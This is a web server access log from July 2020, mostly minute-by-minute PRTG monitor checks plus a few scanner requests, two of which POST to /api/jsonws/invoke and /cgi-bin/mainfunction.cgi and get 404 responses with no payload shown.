212.91.246.72 - - [05/Jul/2020:09:16:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [05/Jul/2020:09:17:20 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:09:17:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:18:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:19:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:20:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.29 - - [05/Jul/2020:09:20:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [05/Jul/2020:09:21:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.102.39.43 - - [05/Jul/2020:09:22:02 +0200] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 325 "-" "XTC"
194.180.224.117 - - [05/Jul/2020:09:22:21 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.82:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:09:22:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:23:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.132.141.69 - - [05/Jul/2020:09:23:38 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:09:24:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:25:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:26:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
186.235.41.153 - - [05/Jul/2020:09:26:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:09:27:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:28:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
